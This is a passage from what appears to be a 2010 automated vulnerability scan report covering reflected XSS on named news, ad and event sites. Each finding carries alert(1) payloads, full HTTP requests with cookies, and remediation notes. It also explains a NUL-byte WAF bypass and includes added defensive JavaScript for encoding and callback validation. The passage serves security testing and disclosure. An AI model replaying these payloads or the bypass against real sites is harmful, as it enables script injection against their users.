<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %3A%2F%2Fanalytics.informationweek.com%2Fresearch%3F14849--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ef31515ac1f5%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/research?14849--><script>alert(1)</script>f31515ac1f5=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 22dc6--><script>alert(1)</script>5913f7ce75e was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rss22dc6--><script>alert(1)</script>5913f7ce75e/index.html HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:40:51 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:40:51 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... =http%3A%2F%2Fanalytics.informationweek.com%2Frss22dc6--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E5913f7ce75e%2Findex.html&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/rss22dc6--><script>alert(1)</script>5913f7ce75e/index.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into an HTML comment. The payload e4b3a--><script>alert(1)</script>e8e80bc009f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rss/index.htmle4b3a--><script>alert(1)</script>e8e80bc009f HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:41:01 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:41:01 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45863
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... %2Fanalytics.informationweek.com%2Frss%2Findex.htmle4b3a--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ee8e80bc009f&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/rss/index.htmle4b3a--><script>alert(1)</script>e8e80bc009f"> ...[SNIP]...
3.164. http://analytics.informationweek.com/rss/index.html [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /rss/index.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 1e8de--><script>alert(1)</script>9cc75c83203 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /rss/index.html?1e8de--><script>alert(1)</script>9cc75c83203=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... tics.informationweek.com%2Frss%2Findex.html%3F1e8de--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E9cc75c83203%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/rss/index.html?1e8de--><script>alert(1)</script>9cc75c83203=1"> ...[SNIP]...
The value of REST URL parameter 1 is copied into an HTML comment. The payload 293fd--><script>alert(1)</script>bd5549d045a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /us293fd--><script>alert(1)</script>bd5549d045a HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
Response
HTTP/1.1 404 Not Found Date: Sun, 12 Dec 2010 01:39:24 GMT Server: Apache X-Powered-By: PHP/5.3.2 ZendServer/5.0 Expires: Thu, 19 Nov 1981 08:52:00 GMT Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0 Pragma: no-cache Set-Cookie: iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; expires=Sat, 11-Dec-2010 15:39:24 GMT; path=/ Connection: close Content-Type: text/html Content-Length: 45837
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... s/login?service=http%3A%2F%2Fanalytics.informationweek.com%2Fus293fd--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3Ebd5549d045a&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/us293fd--><script>alert(1)</script>bd5549d045a"> ...[SNIP]...
3.166. http://analytics.informationweek.com/us [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://analytics.informationweek.com
Path: /us
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a51e5--><script>alert(1)</script>7a7f25fa9fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /us?a51e5--><script>alert(1)</script>7a7f25fa9fe=1 HTTP/1.1 Host: analytics.informationweek.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292117268788; s_cc=true; iwkbtn_101201=9297530625|1291241986731; iwkbtn_emc_101111=7192037394|1289542143541; PHPSESSID=g3cfi91pdrgd76f8catta76g33; s_sq=%5B%5BB%5D%5D; s_nr=1289542256120; s_lv_s=Less%20than%201%20day; iwa_user_login_check=ZzNjZmk5MXBkcmdkNzZmOGNhdHRhNzZnMzM%3D; __qca=P0-1196101997-1292112032216;
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <!-- This Line will output the doctype we set inside the bootstrap file --> <html xmlns="h ...[SNIP]... service=http%3A%2F%2Fanalytics.informationweek.com%2Fus%3Fa51e5--%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E7a7f25fa9fe%3D1&siteId=300001&successfulLoginRedirect=http://analytics.informationweek.com/us?a51e5--><script>alert(1)</script>7a7f25fa9fe=1"> ...[SNIP]...
The value of the func request parameter is copied into the HTML document as plain text between tags. The payload 91a1c<script>alert(1)</script>dde4d07688b was submitted in the func parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /b/node_rcAll.pli?func=COMSCORE.BMX.Buddy.run91a1c<script>alert(1)</script>dde4d07688b&1292111969285 HTTP/1.1 Host: ar.voicefive.com Proxy-Connection: keep-alive Referer: http://www.darkreading.com/blog/archives/evil-bytes/index.html Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ar_p43112268=exp=1&initExp=Sat Oct 30 01:41:28 2010&recExp=Sat Oct 30 01:41:28 2010&prad=48493791&arc=37093140&; ar_p76230671=exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&; ar_p70821733=exp=3&initExp=Sat Nov 20 17:21:59 2010&recExp=Sat Nov 20 17:22:00 2010&prad=259071293&arc=184503545&; ar_p72213098=exp=2&initExp=Thu Nov 25 14:06:18 2010&recExp=Thu Nov 25 14:08:26 2010&prad=56363817&arc=38845248&; ar_70821733=exp=1&initExp=Thu Nov 25 14:08:26 2010&recExp=Thu Nov 25 14:08:26 2010&prad=259071220&arc=iwchyu00003309&; ar_p76459327=exp=1&initExp=Sun Dec 5 00:50:24 2010&recExp=Sun Dec 5 00:50:24 2010&prad=56089138&arc=39228779&; BMX_BR=pid=p76910469&prad=50021&arc=521&exp=1292110859; ar_p76910469=exp=1&initExp=Sat Dec 11 23:40:59 2010&recExp=Sat Dec 11 23:40:59 2010&prad=50021&arc=521&; UID=177862ed-204.0.5.41-1288922372; BMX_3PC=1
Response
HTTP/1.1 200 OK Server: nginx Date: Sun, 12 Dec 2010 01:36:58 GMT Content-Type: application/x-javascript Connection: close Set-Cookie: BMX_G=0; expires=Tue 18-Mar-2008 01:36:58 GMT; path=/; domain=.voicefive.com; P3P: policyref="/w3c/p3p.xml", CP="NOI COR NID CUR DEV TAI PSA IVA OUR STA UNI NAV INT" Cache-Control: max-age=0, no-cache, no-store, must-revalidate Pragma: no-cache Expires: -1 Vary: User-Agent,Accept-Encoding Content-Length: 1013
COMSCORE.BMX.Buddy.run91a1c<script>alert(1)</script>dde4d07688b({ "ar_p76230671": 'exp=1&initExp=Fri Nov 5 01:59:32 2010&recExp=Fri Nov 5 01:59:32 2010&prad=7777&arc=77&', "UID": '177862ed-204.0.5.41-1288922372', "ar_p76910469": 'exp=1&initExp=Sat Dec 11 23: ...[SNIP]...
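The func finding above is a JSONP endpoint: the response body is the value of func followed by a parenthesised JSON object, served as application/x-javascript. Because the body is a script rather than HTML, entity encoding is the wrong tool; the fix is to accept only a callback name that is a plain dotted JavaScript identifier and reject everything else. The following is an added example, not code from the scan report or from ar.voicefive.com. The validation regex, the length cap and the buildJsonpResponse helper are assumptions; the two callback values are copied from the report's request line.

```javascript
// Added example: allow-listing a JSONP callback name. Function names and
// the response shape are assumptions; the callback values come from the
// scan report.

// Legitimate value and injected value from the report's request line.
const GOOD_CALLBACK = 'COMSCORE.BMX.Buddy.run';
const BAD_CALLBACK = 'COMSCORE.BMX.Buddy.run91a1c<script>alert(1)</script>dde4d07688b';

// One or more identifier segments joined by dots: letters, digits, '_' and
// '$' only, never starting with a digit. No brackets, quotes, spaces or
// operators, so the name cannot carry code of its own.
const CALLBACK_RE = /^[A-Za-z_$][A-Za-z0-9_$]*(?:\.[A-Za-z_$][A-Za-z0-9_$]*)*$/;

function isValidCallbackName(name) {
  return typeof name === 'string' && name.length <= 128 && CALLBACK_RE.test(name);
}

// Build the JSONP response, or return null when the callback is rejected
// (the caller should answer 400). Data values are JSON-encoded and have
// '<' and '>' escaped, so they cannot inject code either.
function buildJsonpResponse(callback, data) {
  if (!isValidCallbackName(callback)) return null;
  const json = JSON.stringify(data)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e');
  return {
    headers: {
      'Content-Type': 'application/javascript; charset=utf-8',
      // Stops a browser from rendering the body as HTML if it is opened directly.
      'X-Content-Type-Options': 'nosniff',
    },
    body: `${callback}(${json});`,
  };
}
```

The same rule applies to any endpoint that emits a script body from request data: validate the callback against a strict pattern, never encode it, and send the response with a script content type and nosniff so that a browser that navigates to it directly will not interpret the body as HTML.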
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec245"><a>47e42fc78c7 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /2011/Registrations/Registrationec245"><a>47e42fc78c7 HTTP/1.1 Host: cloudconnectevent.reg.techweb.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0052ba0"><script>alert(1)</script>be250937786 was submitted in the REST URL parameter 1. This input was echoed as 52ba0"><script>alert(1)</script>be250937786 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request
GET /submit%0052ba0"><script>alert(1)</script>be250937786 HTTP/1.1 Host: digg.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
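The digg.com finding above has two parts: a filter in front of the application that stops reading at a NUL byte, and an application that writes the decoded path into a double-quoted attribute without encoding it. The following is an added example, not code from the scan report or from digg.com. It models the filter as a native-code WAF would behave (string handling ends at the first NUL), shows the same blocklist over the full input, and then shows the application-level fix, attribute-context encoding, which holds regardless of what the filter does. The blocklist terms, the link template and the function names are assumptions; the request path is copied from the report.

```javascript
// Added example: NUL-byte filter bypass and the attribute-encoding fix.
// BLOCKED, the link template and the function names are assumptions; the
// path is the one from the scan report's request line.

const RAW_PATH = '/submit%0052ba0"><script>alert(1)</script>be250937786';

const BLOCKED = ['<script', 'onerror', 'javascript:'];

// Filter as native code might implement it: the decoded input is handled
// as a C string, so everything after the first NUL byte is invisible.
function nativeStyleFilterBlocks(decoded) {
  const visible = decoded.split('\0')[0];
  return BLOCKED.some((t) => visible.toLowerCase().includes(t));
}

// Same blocklist over the whole decoded input. Still a blocklist, so still
// bypassable by other tricks; shown only to isolate the NUL-byte flaw.
function fullLengthFilterBlocks(decoded) {
  return BLOCKED.some((t) => decoded.toLowerCase().includes(t));
}

// Application-side fix: encode for the HTML attribute context. With '"'
// encoded the attribute cannot be closed, so no new tag can start, whatever
// the filter did. Control characters such as NUL are dropped as well.
function encodeForHtmlAttribute(s) {
  return s
    .replace(/[\u0000-\u001f\u007f]/g, '')
    .replace(/&/g, '&amp;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#39;')
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;');
}

// Hypothetical template that writes the request path into an href.
function renderLinkUnsafe(path) {
  return `<a href="http://digg.com${path}">retry</a>`;
}

function renderLink(path) {
  return `<a href="http://digg.com${encodeForHtmlAttribute(path)}">retry</a>`;
}

// Count start and end tags in a fragment; the injected payload adds two.
function elementCount(html) {
  return (html.match(/<\/?[a-z][^>]*>/gi) || []).length;
}

function decodedReportPath() {
  return decodeURIComponent(RAW_PATH);
}
```

Against the decoded path the NUL-aware filter lets the payload through while the full-length check catches it; against the same input renderLink produces exactly the two tags of the template, renderLinkUnsafe four. Fixing the filter is worthwhile, but only the encoding in renderLink removes the vulnerability.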
The value of the mpck request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c8384"%3balert(1)//7e9279ed66f was submitted in the mpck parameter. This input was echoed as c8384";alert(1)//7e9279ed66f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12688/116269/4274_flash_DOCSIS_02_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-116269-3297-1%3Fmpt%3D68406c8384"%3balert(1)//7e9279ed66f&mpt=68406&mpvc= HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.lightreading.com/blog.asp?blog_sectionid=419&doc_id=180545&site=cdn& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:41:42 GMT Server: Apache Last-Modified: Tue, 16 Nov 2010 22:31:13 GMT ETag: "64ad3a-c1f-495331d392e40" Accept-Ranges: bytes Content-Length: 4158 Content-Type: application/x-javascript
The value of the mpvc request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 81b02"%3balert(1)//4b68246e013 was submitted in the mpvc parameter. This input was echoed as 81b02";alert(1)//4b68246e013 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /content/0/12688/116269/4274_flash_DOCSIS_02_336x280.js?mpck=altfarm.mediaplex.com%2Fad%2Fck%2F12688-116269-3297-1%3Fmpt%3D68406&mpt=68406&mpvc=81b02"%3balert(1)//4b68246e013 HTTP/1.1 Host: img.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.lightreading.com/blog.asp?blog_sectionid=419&doc_id=180545&site=cdn& Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: svid=OPT-OUT; __utmz=183366586.1289108887.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=183366586.1043956060.1289108887.1289108887.1289108887.1
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 01:41:54 GMT Server: Apache Last-Modified: Tue, 16 Nov 2010 22:31:13 GMT ETag: "64ad3a-c1f-495331d392e40" Accept-Ranges: bytes Content-Length: 4134 Content-Type: application/x-javascript
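The two img.mediaplex.com findings above (mpck and mpvc) are the same defect: a request parameter is written into a double-quoted JavaScript string literal in a served script, so a '"' in the value ends the literal and the remainder runs as code. The following is an added example, not code from the scan report or from img.mediaplex.com. It assumes a hypothetical script template that assigns the parameter to a variable, and uses the mpck value from the report (URL-decoded, so %3b is ';') to show the breakout and a JSON-based literal encoder that prevents it.

```javascript
// Added example: safe embedding of request data in a JavaScript string
// literal. The template and function names are assumptions; the value is
// the mpck parameter from the scan report after URL decoding.

const MPCK_PAYLOAD = 'altfarm.mediaplex.com/ad/ck/12688-116269-3297-1?mpt=68406c8384";alert(1)//7e9279ed66f';

// Vulnerable: the value is dropped into the literal as-is. The '"' in the
// payload ends the string, ';alert(1)' runs, and '//' comments out the rest.
function emitScriptUnsafe(value) {
  return `var mpck = "${value}";`;
}

// Fix: let the JSON encoder produce the literal (it escapes '"', '\\' and
// control characters), then escape '<' and '>' so the value can never form
// a '</script>' tag if the script is ever inlined in HTML, and the two
// Unicode line terminators that some engines treat as newlines.
function jsStringLiteral(value) {
  return JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/>/g, '\\u003e')
    .replace(/\u2028/g, '\\u2028')
    .replace(/\u2029/g, '\\u2029');
}

function emitScript(value) {
  return `var mpck = ${jsStringLiteral(value)};`;
}

// Check: execute the emitted script with a stubbed alert() and confirm that
// the variable holds exactly the original value and nothing else ran.
function roundTripsWithoutSideEffects(script, original) {
  let alertCalls = 0;
  const run = new Function('alert', script + '\nreturn mpck;');
  const result = run(() => { alertCalls += 1; });
  return result === original && alertCalls === 0;
}
```

The check fails for emitScriptUnsafe (alert is called and the variable holds only the text before the injected quote) and passes for emitScript. Where the served file is a static script with substituted values, as the Last-Modified and ETag headers above suggest, the same encoder belongs at the substitution point.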
3.172. http://jlinks.industrybrains.com/jsct [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://jlinks.industrybrains.com
Path: /jsct
Issue detail
The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 4f295<script>alert(1)</script>1142b7b9f33 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /jsct?sid=570&ct=INFORMATIONWEEK_ROS&num=5&layt=6&fmt=simp&4f295<script>alert(1)</script>1142b7b9f33=1 HTTP/1.1 Host: jlinks.industrybrains.com Proxy-Connection: keep-alive Referer: http://www.informationweek.com/blog/main/archives/global_cio/index.html;jsessionid=BD1RLVNFL22WZQE1GHPSKH4ATMY32JVN?subSection=global_cio Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.215 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: __utma=132846550.1002835965.1291273976.1291273976.1291273976.1; __utmz=132846550.1291273976.1.1.utmccn=(referral)|utmcsr=burp|utmcct=/show/61|utmcmd=referral
Response
HTTP/1.1 200 OK Connection: close Date: Sun, 12 Dec 2010 01:41:15 GMT Server: Microsoft-IIS/6.0 Cache-Control: no-cache, max-age=0, must-revalidate Pragma: no-cache Expires: Sun, 12 Dec 2010 01:41:15 GMT Content-Type: application/x-javascript Content-Length: 69
3.173. http://www.cloudconnectevent.com/2010/exhibitor-news.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /2010/exhibitor-news.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload eaf64--><img%20src%3da%20onerror%3dalert(1)>2ca9c2f03a6 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as eaf64--><img src=a onerror=alert(1)>2ca9c2f03a6 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /2010/exhibitor-news.php/eaf64--><img%20src%3da%20onerror%3dalert(1)>2ca9c2f03a6 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:56 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 33237
3.174. http://www.cloudconnectevent.com/2010/in-the-news.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /2010/in-the-news.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload 5e6af--><img%20src%3da%20onerror%3dalert(1)>5fea788f2b0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5e6af--><img src=a onerror=alert(1)>5fea788f2b0 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.
Request
GET /2010/in-the-news.php/5e6af--><img%20src%3da%20onerror%3dalert(1)>5fea788f2b0 HTTP/1.1 Host: www.cloudconnectevent.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1292111927793; s_cc=true; WibiyaLoads=1; __utmz=172166641.1292111928.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sq=%5B%5BB%5D%5D; s_nr=1292111927791; wibiya654744_unique_user=1; WibiyaProfile=%7B%22toolbar%22%3A%7B%22stat%22%3A%22Max%22%7D%2C%22apps%22%3A%7B%22openApps%22%3A%7B%7D%7D%2C%22connectUserNetworks%22%3A%5Bnull%2Cnull%2Cnull%2Cnull%2Cnull%2Cnull%5D%7D; __utma=172166641.1378788425.1292111928.1292111928.1292111928.1; s_lv_s=First%20Visit; __utmc=172166641; __utmb=172166641.1.10.1292111928;
Response
HTTP/1.1 200 OK Date: Sun, 12 Dec 2010 00:31:54 GMT Server: Apache X-Powered-By: PHP/5.1.6 Connection: close Content-Type: text/html Content-Length: 51931
3.175. http://www.cloudconnectevent.com/about/what-is-cloud-computing.php [name of an arbitrarily supplied request parameter]
Summary
Severity: High
Confidence: Certain
Host: http://www.cloudconnectevent.com
Path: /about/what-is-cloud-computing.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into an HTML comment. The payload a25a6--><img%20src%3da%20onerror%3dalert(1)>3c8bf8590b1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as a25a6--><img src=a onerror=alert(1)>3c8bf8590b1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Remediation detail
